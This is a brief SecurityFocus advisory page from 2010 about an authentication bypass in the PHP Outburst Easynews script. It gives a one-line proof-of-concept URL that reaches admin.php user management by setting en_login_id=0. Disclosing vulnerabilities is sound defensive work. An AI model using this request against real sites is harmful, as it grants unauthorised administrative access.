info
discussion
exploit
solution
references
PHP Outburst Easynews Authentication Bypass Vulnerability
Attackers can exploit this issue via a web client.
The following proof of concept is available:
http://www.example.com/[path]/admin.php?action=users&en_login_id=0
Privacy Statement
Copyright 2010, SecurityFocus
